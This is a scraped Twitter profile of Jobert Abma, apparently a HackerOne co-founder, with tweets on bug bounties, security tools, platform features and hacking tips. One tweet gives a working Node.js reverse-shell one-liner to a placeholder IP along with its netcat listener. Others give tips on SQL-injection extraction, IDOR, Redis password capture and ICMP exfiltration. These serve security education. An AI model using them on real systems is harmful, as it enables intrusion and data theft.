Jobert Abma @jobertabma Twitter profile

Pinned Tweet

Jobert Abma

5 years

Hackers, I've built a small game that helps improve your XSS skills! It dynamically generates (increasingly more difficult) levels for you to exploit XSS vulnerabilities. No level is the same. Let me know what you think. Happy hacking! #TogetherWeHitHarder

81

1K

3K

Last Seen Profiles

@taimchi_u

@Papuaviral1

@Wolfpup_Takashi

@princessdajaa

@0MNS3

@OW_is_godgame

@YALLcomedy

@yoitsiron

@poppo_lv99

@thengoworld

@FRchangan

@di_calvi

@AD0LFZ

@yaelahnazu

@saintfloewmusic

@englishfess_

@CaedenHolly

@jeepstermike

@MartinWiesmeier

@heymike

@MerrickBright

@NWS_BaltWash

@Kyledrealways

@princessdajaa

@kanekane_bul

@alienfornia

@piinkiminkii

@YohoPharmD

@Titt_0

@JeseniaWhyte

@aspromecorg

@Protestants070

@nne_bisi

@CharlieWhite_22

@good_rib

Jobert Abma

@jobertabma

4 years

Hackers, I wrote a new tool called Transformations — it’ll help you understand how input is transformed on a system, which can help you craft better payloads. It’s available at . Code at . Happy crafting! #HackForGood

27

583

2K

Jobert Abma

@jobertabma

3 years

In April, I submitted 0 vulnerabilities to 0 programs on @Hacker0x01 and became father of 1 daughter. #TogetherWeHitHarder

91

1

855

Jobert Abma

@jobertabma

4 years

Hackers, for the next 12 hours I’m going to run an experiment: you tell me which vulnerability class you want to learn more about and I will write vulnerable code so you can run and exploit it locally. Tweet me the vuln type and I’ll add code to a repository. #TogetherWeHitHarder

121

200

811

Jobert Abma

@jobertabma

6 years

Hackers, here's a brain dump to help you understand my general (post-recon) application security testing methodology and how I find high / critical vulnerabilities. This is how I demonstrate the value as a hacker. 💰 Ask me anything. #TogetherWeHitHarder

33

282

778

Jobert Abma

@jobertabma

2 years

Me explaining why my vulnerability is a critical

18

81

671

Jobert Abma

@jobertabma

9 months

mega7 found a neat SSRF vulnerability in H1 and got $25,000 for it: !

HackerOne disclosed on HackerOne: Server Side Request Forgery...

We recently received a critical server-side request forgery (SSRF) vulnerability report through our bug bounty program. The issue allowed attackers to make internal requests from our application...

hackerone.com

12

84

608

Jobert Abma

@jobertabma

3 years

Lord give me the confidence of a hacker who just found their first server banner disclosure and already added “InfoSec expert” to their LinkedIn.

22

61

600

Jobert Abma

@jobertabma

4 years

$100,000,000.00 in bounties for the hacker community. What an amazing achievement of hackers all around the world. And y’all are just getting started! The future will bring even more opportunity to contribute to a safer internet. 👏👏👏 #HackerOneHits100

21

61

546

Jobert Abma

@jobertabma

3 years

What is your favorite security vulnerability or writeup that was disclosed in 2021? Let’s create a 🧵 with the best, coolest, weirdest, most impressive reports from this year!

36

164

528

Jobert Abma

@jobertabma

7 years

This is how I sometimes feel chaining multiple vulnerabilities to get to high/critical severity.

20

169

497

Jobert Abma

@jobertabma

5 years

Hackers, join me in congratulating @santi_lopezz99 , @bugbountyhq , @fransrosen , @nnwakelam , @ngalongc , and @thedawgyg for all hitting $1,000,000 USD on @Hacker0x01 ! They're role models for all of us. Together we're building an amazing community that made this possible. ❤️

20

51

460

Jobert Abma

@jobertabma

1 year

I’m giving away a Burp Suite Pro license! A Pro license auto renewed and the hacker that I personally sponsored makes enough money from @Hacker0x01 to afford it themselves 🎊 Mention someone that deserves the license in the replies to this tweet and I’ll pick someone in 24h.

323

78

467

Jobert Abma

@jobertabma

3 years

10

43

460

Jobert Abma

@jobertabma

5 years

Hackers, with a redesign of the Program Profiles, we’ve also released a new feature: download @Burp_Suite Project files. It enables you to import a Program scope into Burp. No need to manually set up scope in Burp anymore. You can find it at the bottom of a Scope. Happy hacking!

20

111

454

Jobert Abma

@jobertabma

5 years

Hackers, today we’re announcing our Series D funding! This round brings us to over $110,000,000 USD invested since the company was founded. I wanted to take a moment to reflect on how you, the hacker community, have enabled us on our journey. Small story👇!

20

45

455

Jobert Abma

@jobertabma

4 years

Hackers, I released a new version of Transformations today. You now don’t have to think about the output anymore; simply paste in the entire HTTP response and it’ll detect transformations in it. @_nwodtuhs added Docker support (first PR, thanks!).

8

102

440

Jobert Abma

@jobertabma

7 years

New tool: recon.sh! Hackers lose their recon data all the time or have multiple ways to track it, so here's a tool to track and organize it all a git repository (it even includes search!). Think of all the productivity gains! #TogetherWeHitHarder

GitHub - jobertabma/recon.sh: A toolset to track and organize output of reconnaissance tools

A toolset to track and organize output of reconnaissance tools - jobertabma/recon.sh

github.com

6

194

435

Jobert Abma

@jobertabma

5 years

Two months ago I found three minor bugs that led to an attacker being able to access confidential data and me getting a $12,000 bounty. It’s a rather long read, but if you want to see what I found: ! #TogetherWeHitHarder

GitLab disclosed on HackerOne: Project Template functionality can...

I've found a three minor vulnerabilities which, when combined, allow an attacker to copy private repositories, confidential issues, private snippets, and then some. I'll go through the code path to...

hackerone.com

4

107

410

Jobert Abma

@jobertabma

7 years

Hackers, if you ever need to spawn a reverse shell in Node.js context: require('child_process').exec('bash -i >& /dev/tcp/1.2.3.4/80 0>&1');. Requires a listener, like nc -lnvvkp 80, on the remote machine.

4

161

398

Jobert Abma

@jobertabma

6 years

Hackers, minor cool insight that I gained some time ago and found a vulnerability with: when you're looking at an asset that may use a microservices architecture, look for IDOR vulnerabilities using path traversal. E.g. https://example/?id=1/../2. See thread. #TogetherWeHitHarder

7

145

387

Jobert Abma

@jobertabma

7 years

Hackers, did you find a SQL injection in an ORDER BY clause and you're unable to guess the column names? Use CASE WHEN <query> THEN RAND() ELSE 1 END to extract data. It'll randomize the order when <query> evaluates to true and remain static when false. #TogetherWeHitHarder

4

128

385

Jobert Abma

@jobertabma

5 years

Hacker tip: when you’re looking for IDORs in a model that references another model, try storing IDs that don’t exists yet. I’ve seen a number of times now that, because the model can’t be found, the system will save the ID. (1/2) #TogetherWeHitHarder

5

99

384

Jobert Abma

@jobertabma

3 years

Hackers, would you participate in a CTF where you’d learn more about machine learning and exploit vulnerabilities in ML models? If people are eager to learn more about this, I’ll put something together!

Jobert Abma

@jobertabma

3 years

The next big vulnerability class will be letting machine learning models make decisions in an attacker’s favor based on (faulty) inputs. The next big skill will be the ability to reverse engineer those models / infer inputs based on its decisions.

7

16

156

24

44

378

Jobert Abma

@jobertabma

7 years

Hackers, besides running a subdomain scan, also try to enumerate virtual hosts on a webserver. Scanner here: !

GitHub - jobertabma/virtual-host-discovery: A script to enumerate virtual hosts on a server.

A script to enumerate virtual hosts on a server. Contribute to jobertabma/virtual-host-discovery development by creating an account on GitHub.

github.com

4

159

356

Jobert Abma

@jobertabma

7 years

Found an interesting vulnerability today: encapsulating an existing username in quotes during sign up would generate a JWT token for username without quotes instead of with quotes. Gotta love a clean account takeover!

11

97

361

Jobert Abma

@jobertabma

7 years

Here's a detailed writeup on how I find and exploit command injection vulnerabilities: . #TogetherWeHitHarder

How To: Command Injections

A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it,...

www.hackerone.com

6

174

359

Jobert Abma

@jobertabma

3 years

H1 concluded its investigation for the log4j vulnerability (CVE-2021-44228) earlier today. 2 assets used a vulnerable version of log4j but were not exploitable. If you can exploit the vulnerability on any H1 assets, we’ll pay up to $25,000 for it through .

HackerOne - Bug Bounty Program | HackerOne

The HackerOne Bug Bounty Program enlists the help of the hacker community at HackerOne to make HackerOne more secure. HackerOne is the #1 hacker-powered security platform, helping organizations find...

hackerone.com

2

67

343

Jobert Abma

@jobertabma

4 years

~Four hours into this experiment and so far I've published vulnerable code for (Blind) SQLi, misconfigured CORS, DOM clobbering, RCE, Command Injection, SSRF (and DNS rebind), Deserialize bugs, XSS, and XXE. See . Keep 'm coming!

Jobert Abma / vulnerable-code · GitLab

GitLab.com

gitlab.com

Jobert Abma

@jobertabma

4 years

Hackers, for the next 12 hours I’m going to run an experiment: you tell me which vulnerability class you want to learn more about and I will write vulnerable code so you can run and exploit it locally. Tweet me the vuln type and I’ll add code to a repository. #TogetherWeHitHarder

121

200

811

11

104

333

Jobert Abma

@jobertabma

3 years

Eid Mubarak to all that are celebrating!

29

10

338

Jobert Abma

@jobertabma

5 years

Cookies, credentials, and tokens are manually redacted in @Hacker0x01 comments every single day. Sometimes, people accidentally forget. Because of that we've introduced a new feature that warns you and offers best-effort redaction before you submit. Happy █████████!

7

48

337

Jobert Abma

@jobertabma

4 years

Hackers, at times, a video is worth a 1,000 words. So today, we're launching a nifty feature that allows you to record a PoC from within the platform alongside your report. You can find it in the Report Wizard and Action Picker. Happy reco... uh, hacking! h/t @sovanderpol

11

42

335

Jobert Abma

@jobertabma

7 years

Hackers, instead of looking for all the vulnerability types at once, pick one. Work your way through the attack surface and ONLY look for one thing. This will help you focus and find more. It'll also help you prioritize what you should be learning next. #TogetherWeHitHarder

8

76

318

Jobert Abma

@jobertabma

6 years

Hackers, I wrote down some advice about what you can do when you're stuck hacking: . Thanks for all the great input I got from you last week on the poll! Let me know if you have any other good ideas, happy to add. #TogetherWeHitHarder

What To Do When You're Stuck Hacking

Hacking can be tedious work. Sometimes you’re looking for hours, perhaps days, and you’re unable to find a security vulnerability. It can be demotivating at times. This blog will give you multiple...

www.hackerone.com

11

119

319

Jobert Abma

@jobertabma

1 year

. @Hacker0x01 has rolled out new AI that supports hackers finding the same vulnerability in other H1 customers! Today, we're announcing our first milestone: enabling hackers to find and validate CVEs () at scale. 🧵

8

55

320

Jobert Abma

@jobertabma

4 years

It's Friday night, I'm sipping red wine, and I gave in to my urge to hack. I spent some hours looking for vulnerabilities in our own site. I found a high severity vulnerability and wrote a 1,600 word report about it. I'm on a hackers high right now. I love this.

13

5

319

Jobert Abma

@jobertabma

5 years

Hackers, we’ve reconsidered our stance on the negative effect on your H1 reputation for duplicates of self-closed reports. Going forward, they’ll be reputation neutral. We’ve retroactively applied this change so your reputation and signal might’ve gone up. Happy hacking!

13

39

314

Jobert Abma

@jobertabma

6 years

Hackers, this is something I've been looking forward to: starting today, when you're completing CTFs on Hacker101, you'll be invited to private programs on @Hacker0x01 ! We will continue to launch new, cool CTFs for you to find more flags and hack more!

7

89

304

Jobert Abma

@jobertabma

3 years

Achievement unlocked: I was assigned a CVE for a security vulnerability in… CVE: . When building an internal tool on top of MITRE’s API I read through their code and found a horizontal privilege escalation that granted admin access to other CNAs!

13

27

309

Jobert Abma

@jobertabma

8 years

Hacker tip: always be coding - it'll broaden your perspective on how software is build and learn you new tricks how to get around defenses.

10

62

293

Jobert Abma

@jobertabma

7 years

Here’s a detailed writeup on what techniques I use for testing and exploiting SSRFs: . #TogetherWeHitHarder

How To: Server-Side Request Forgery (SSRF)

Server-Side Request Forgery, SSRF for short, is a vulnerability class that describes the behavior of a server making a request that’s under the attacker’s control. This post will go over the impact,...

www.hackerone.com

6

147

283

Jobert Abma

@jobertabma

7 years

PSA: met someone who keeps me sane, applauds hacking, and supports my entrepreneurship. I married my best friend! #TogetherWeHitHarder

88

9

279

Jobert Abma

@jobertabma

6 years

Hackers, we have more exciting news: @HackEDU has built so-called "hackboxes" where you can find and exploit the same vulnerabilities as disclosed on the @Hacker0x01 Hacktivity feed. You can now find the same vulnerabilities other hackers once found!

Test your hacking skills on real-world simulated bugs

Five sandbox environments of recently disclosed hacktivity reports available for anyone to test their hacking skills and see if they can replicate the same bug that was discovered. #hackon

www.hackerone.com

8

113

272

Jobert Abma

@jobertabma

1 year

New: read something interesting in a @Hacker0x01 report that you want to know more of? Select the text and discover similar reports on Hacktivity with ease.

4

27

272

Jobert Abma

@jobertabma

2 years

Two people found a vulnerability that allowed anyone to (un)archive any asset on , they both got $12,500 for it! Root cause: a class inherited from a class that had a similar interface but skipped the authorization check.

HackerOne disclosed on HackerOne: An attacker can archive and...

@ahacker1 found an Insecure Direct Object Reference (IDOR) vulnerability that allowed anyone to archive and unarchive an asset on HackerOne.com. This wasn't an easy vulnerability to spot: when...

hackerone.com

6

38

271

Jobert Abma

@jobertabma

2 years

👀 @_StaticFlow_ and @Hacker0x01 are up to something. We can detect CWE and vulnerable asset straight from Burp, preparing most of the H1 report for you, enabling you to focus on what you do best: hacking. Should this experiment see the light of day? Let me know! h/t @Burp_Suite

5

36

264

Jobert Abma

@jobertabma

3 years

Watching @Hacker0x01 's #hacktivitycon2021 with the next generation! h/t @NahamSec @_JohnHammond

8

9

263

Jobert Abma

@jobertabma

7 years

Here are most of my tools that I use to debug SSRF, blind XSS, and XXE vulnerabilities! #TogetherWeHitHarder

GitHub - jobertabma/ground-control: A collection of scripts that run on my web server. Mainly for...

A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities. - jobertabma/ground-control

github.com

3

136

257

Jobert Abma

@jobertabma

2 months

Hacker tip: more and more organizations are experimenting and deploying data analysis using language models, often rendering results in a web context. A new attack vector will become blind XSS vulnerabilities through prompt injections. For large blobs of text, I’d suggest you

5

31

264

Jobert Abma

@jobertabma

7 years

New tool: extracting relative URLs from minified files. Very helpful during recon! #TogetherWeHitHarder

GitHub - jobertabma/relative-url-extractor: A small tool that extracts relative URLs from a file.

A small tool that extracts relative URLs from a file. - jobertabma/relative-url-extractor

github.com

2

119

252

Jobert Abma

@jobertabma

6 years

In December I found a number bugs in @gitlab , all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking! #TogetherWeHitHarder

9

64

253

Jobert Abma

@jobertabma

2 years

This is me trying to convince the security analyst that it *really* is a critical severity vulnerability.

7

25

253

Jobert Abma

@jobertabma

1 year

New: @Hacker0x01 Hacktivity annotations! Publicly disclosed reports are now automatically summarized using AI to make them even easier to consume. Summaries are provided in five languages. Check it out:

14

20

253

Jobert Abma

@jobertabma

3 years

Hackers, we’re getting close to launch HackerOne’s new markdown engine and we need a few beta testers. It has feature parity with the current engine. We’ve been running this for ourselves for sometime and are ready for more feedback. Let me know if you want to give it a shot!

85

12

248

Jobert Abma

@jobertabma

2 years

Found my first security vulnerability in a smart contract CTF today! Spent a total of four hours reading up on solidity, smart contract concepts, and blockchain to understand enough to exploit it - super fun and learned a lot. Hope that the CTF will make it into H101 soon!

6

4

245

Jobert Abma

@jobertabma

6 years

Roses are red Violets are blue Go spend a bounty On a dinner for two #ValentinesDay

9

27

238

Jobert Abma

@jobertabma

1 year

Hackers, the current state and submission date of the original report are now shown for duplicates on @Hacker0x01 . This increases transparency and reduces ambiguity now that report IDs can no longer be used to determine which report was submitted first.

39

15

239

Jobert Abma

@jobertabma

7 years

This picture was taken by me 5 years ago. It was the day we made the first commit to “Core” (). We’re at 32,000 commits right now across all repositories. We’ve grown to over 100 employees, 1000 customers, and 100,000 hackers. Here’s to the next five!

15

24

238

Jobert Abma

@jobertabma

5 years

Father’s day reminds me that my dad was one of the people to encourage @michielprins and me to start our first company. He would’ve been proud of what the hacker community is today and where is is heading. Last photo of the two of us in Muir Woods (2014):

6

3

228

Jobert Abma

@jobertabma

7 years

Stepping up our swag: we now have prototype WiFi-connected hoodies for your H1 account. It interacts when you receive bounties, increase rank, your reports' change state, and which hackathon you're at! Best: they're designed for you to tinker with. #TogetherWeHitHarder

20

26

227

Jobert Abma

@jobertabma

4 years

Last week an attacker launched two credential stuffing attacks against HackerOne. Here's our incident report: .

HackerOne disclosed on HackerOne: 2020-10-09 Credential Stuffing...

**Executive summary** On October 4, 2020 and October 5, 2020, an attacker launched two [credential stuffing attacks](https://owasp.org/www-community/attacks/Credential_stuffing) against...

hackerone.com

8

31

227

Jobert Abma

@jobertabma

4 years

Hackers, we heard you: transaction fees for high volume bounty receivers can become pretty high, so today we’re announcing Monthly Payouts. It’ll allow you to bundle this months’ earnings into a single transaction. Read more at . #HackForGood

Payment Preferences | HackerOne Help Center

Hackers: Manage payout preferences for your profile

docs.hackerone.com

6

19

220

Jobert Abma

@jobertabma

10 months

Today we’re publicly launching the new @Hacker0x01 Hacktivity! It comes with many new filtering capabilities, a more intuitive UI, powerful search, and better performance. Check it out at and let us know what you think!

14

21

216

Jobert Abma

@jobertabma

3 years

. @ryotkak found a remote code execution vulnerability in cdnjs (Cloudflare), which could've affected 1/8th of the internet: . Such a great writeup and vulnerability! #TogetherWeHitHarder

Remote code execution in cdnjs of Cloudflare

Preface (日本語版も公開されています。) Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments. This article describes...

blog.ryotak.net

2

67

215

Jobert Abma

@jobertabma

6 years

It’s a wrap! H1-91832 was such a success! We all had an amazing time in Goa. @v0sx9b rightfully won the MVH belt, he had very cool findings. @Hacker0x01 will be back in India! #TogetherWeHitHarder

8

36

216

Jobert Abma

@jobertabma

5 years

Hackers, we envision your @Hacker0x01 profile to be your online resumé for security. Today, we're releasing a beta version of what that could look like: . Let us know what you'd like to see to make your profiles stand out! #TogetherWeHitHarder

19

25

214

Jobert Abma

@jobertabma

5 years

Finding truly amazing security vulnerabilities comes from knowing a lot about a little, not knowing a little about a lot. Focus your learning. #TogetherWeHitHarder

7

41

212

Jobert Abma

@jobertabma

1 year

New: Report Templates for hackers on @Hacker0x01 , allowing anyone to reduce the time they spend writing reports. Check it out on .

8

17

215

Jobert Abma

@jobertabma

3 years

Hackers, due to inflation, SQL injection example payloads must now be “' OR 1.23='1.23”. @tayloramurphy

4

30

213

Jobert Abma

@jobertabma

4 years

If you’re wondering how SHA-256 works, you should check out . It’s an animation in your terminal explaining every step of the hashing function! The README of the repository is quite informative, too.

1

53

210

Jobert Abma

@jobertabma

2 years

Getting started in bug bounty for me wasn’t easy. I had to start an entire company for it. It’s still not easy to get started, but, with the help of the community, many resources exist today to get going. But most importantly, do it to learn. The success will follow.

7

19

212

Jobert Abma

@jobertabma

7 years

“Hey Jack, photograph me like one of your Indian hackers” #TogetherWeHitHarder

12

5

208

Jobert Abma

@jobertabma

1 year

The teams at @pdiscoveryio and @Hacker0x01 have been working on implementing Nuclei Cloud into H1 to help scale vulnerability detection for hackers and customers. Here’s a sneak peak. Let us know what you think!

9

29

210

Jobert Abma

@jobertabma

1 year

New: encode and decode text straight from @Hacker0x01 ! Users often need to encode/decode payloads from reports in order to reproduce or retest it. Use this feature by selecting text and clicking "Editor". Let us know what you think and what other transformations we should add!

6

20

212

Jobert Abma

@jobertabma

5 years

On November 24, one of our Security Analyst accidentally posted their H1 session cookie to a HackerOne report while reproducing a potential vulnerability. Here is how we handled the incident: ! #TogetherWeHitHarder

HackerOne disclosed on HackerOne: Account takeover via leaked...

# Incident Report | 2019-11-24 Account Takeover via Disclosed Session Cookie *Last updated: 2019-11-27* ## Issue Summary On November 24, 2019 at 13:08 UTC, HackerOne was notified through the...

hackerone.com

10

43

205

Jobert Abma

@jobertabma

3 years

Ten years ago I submitted my first vulnerability to Apple: a universal Cross-Site Scripting vulnerability in WebKit that affected iOS 3! Today, ten years later, finding vulnerabilities is still my passion.

5

0

202

Jobert Abma

@jobertabma

3 years

Hackers, you can now submit reports and programmatically access your account and program data using the new HackerOne hacker API: . We're excited to see the automations you'll build with it! #TogetherWeHitHarder

12

26

203

Jobert Abma

@jobertabma

3 years

Sneak peek: Hackers, your first language may not be the same as the recipient of a vulnerability you’ve submitted on H1. We’re currently building a feature that offers in-app translations that won’t break the structure of a report or comment, in 71 languages! What do you think?

14

18

197

Jobert Abma

@jobertabma

1 year

10 years @Hacker0x01 ! I’m proud and humbled of the lasting impact we’ve had on so many lives and securing critical infrastructure for all of society with the broader security community. And yet, so much still to achieve and no lack of drive and energy to go pursue it together.

16

7

202

Jobert Abma

@jobertabma

6 years

Hackers, here's a publicly disclosed report that provides a way to escalate some SSRF vulnerabilities to RCE with the AWS EC2 System Manager on AWS (aws ssm): . #TogetherWeHitHarder

michiel published a vulnerability from ██████ on HackerOne: Remote...

## Introduction I discovered this remote code execution (RCE) vulnerability on a proxy service used to track researcher activity. It was an opportunity for me to learn more about AWS, and...

hackerone.com

0

74

201

Jobert Abma

@jobertabma

4 years

As an engineer, every time I read a publicly disclosed security vulnerability or hacker tip, my mind can’t stop thinking about what the code must’ve looked like in the backend to have introduced it. Great exercise and frame of reference for when you yourself are writing code!

3

11

197

Jobert Abma

@jobertabma

6 years

Hacker tip: focus on one particular vulnerability type or one feature at a time when looking at an asset. Make notes throughout the process. This helps you go deeper into a stack and to focus. Understanding the app is the way to more severe vulnerabilities. #TogetherWeHitHarder

2

48

192

Jobert Abma

@jobertabma

4 years

Hackers, an often impactful and under highlighted vulnerability is the ability to write a file to an arbitrary location on a remote system. They’re often hard to exploit and detect from the outside. Couple thoughts and tips in this thread that have helped me. #HackForGood

3

37

193

Jobert Abma

@jobertabma

7 months

About 20 years ago I compiled code to learn about buffer overflows. I couldn’t figure out why the exploit wasn’t working. Until I realized that I was running AMD and the shell code was for Intel. It taught me a lot about how computers work. Moral: failure made me a better hacker!

5

12

192

Jobert Abma

@jobertabma

2 months

I just got off the phone with a hacker that got a $100,000 bounty. Here are the top 5 things in their daily routine that helped them achieve this: 1. Wake up at 1:30p 2. 60m mediation 3. 10m microwaving hot pocket 4. 45m waiting for computer to boot 5. right click > view source,

15

11

193

Jobert Abma

@jobertabma

2 years

@mcipekci @Hacker0x01 @martenmickos Bounties that are split with the hackforgood user on H1 will now go to help people in Türkiye and Syria.

HackerOne profile - hackforgood

Collab with me to donate - https://hackerone.com

hackerone.com

3

51

181

Jobert Abma

@jobertabma

4 years

Informative doesn't impact your signal anymore (and more)!

HackerOne

@Hacker0x01

4 years

Hack on. Some fresh enhancements to how your Reputation, Signal & Impact is calculated. Details in the blog 👉

8

11

130

13

9

176

Jobert Abma

@jobertabma

6 years

A hacker sent me a poem and I can't stop laughing: Jobert can hack Better than a dozen But he doesn't come close To the real Frans Rosen

20

8

186

Jobert Abma

@jobertabma

4 years

I found a bug in ActiveResource that was exploitable on : . It was assigned CVE-2020-8151. Would’ve been a hard bug to find on our systems without having access to internal logging systems.

HackerOne disclosed on HackerOne: GraphQL node interface for...

HackerOne exposes a small number of ActiveResource objects through its GraphQL `node` interface. [ActiveResource](https://github.com/rails/activeresource) objects use HTTP as transport layer in...

hackerone.com

1

30

182

Jobert Abma

@jobertabma

1 year

Happy Holi!

14

7

183

Jobert Abma

@jobertabma

3 years

Yay, I was awarded 40.8m2 bounty on @Hacker0x01 ! #TogetherWeCleanHarder

7

2

182

Jobert Abma

@jobertabma

7 years

Only outbound ICMP traffic allowed and can exec commands? Use to exfiltrate data via ICMP packet size.

2

84

182

Jobert Abma

@jobertabma

6 years

Hackers, we've built a mobile and a web CTF that gets you a trip to #h1702 during DEF CON in Las Vegas! If you're up for a challenge, check out . Best write-ups win!

6

72

180

Jobert Abma

@jobertabma

6 years

Great advice from @fransrosen on how to write a report title today: the title should answer the "WHAT", "WHERE", "WHY", and "HOW". Example: instead of "XSS", use "Reflected XSS on due to unsanitized fragment redirect using javascript protocol" instead.

5

46

178

Jobert Abma

@jobertabma

2 years

Yay, I just paid two $12,500 bounties on @Hacker0x01 ! #TogetherWeHitHarder

4

0

178

Jobert Abma

@jobertabma

6 years

Hacker community, we need to discuss something that's at heart. There have been an increasing number of personal attacks lately, driving people out of the community and making people feel unsafe. I want to talk about values and the culture that I believe should be fostered.

9

41

178

Jobert Abma

@jobertabma

4 years

Hackers, starting today, you can get reputation for vulnerabilities you submit to @Facebook ’s bug bounty program (!) and you’ll be able to get paid through HackerOne for them as well. Welcome FB and happy hacking!

2

14

174

Jobert Abma

@jobertabma

7 years

Recon trick: found a Redis cluster and one of the servers doesn't require a password? Run MONITOR, wait for the master to sync, fetch the AUTH command with the password, and try using the password on the master server. #TogetherWeHitHarder

1

37

175

Jobert Abma

@jobertabma

3 years

Strength in numbers: since Friday, the hacker community has submitted close to 1,000 reports about CVE-2021-44228 to 249 customer programs on @Hacker0x01 , helping organizations discover faster, prioritize better, and remediate with more confidence.

4

25

174

Jobert Abma

@jobertabma

3 years

We just disclosed this beautifully written report and proof of concept from @Jafar_Abo_Nada : . Especially appreciated the additional feedback we got after mitigating the initial vulnerability. It’s worth reading!

HackerOne disclosed on HackerOne: HackerOne Jira integration plugin...

**Summary:** HackerOne provides an application tool [HackerOne for Jira](https://marketplace.atlassian.com/vendors/1214355/hackerone), an application that allows programs to track security issues...

hackerone.com

1

32

171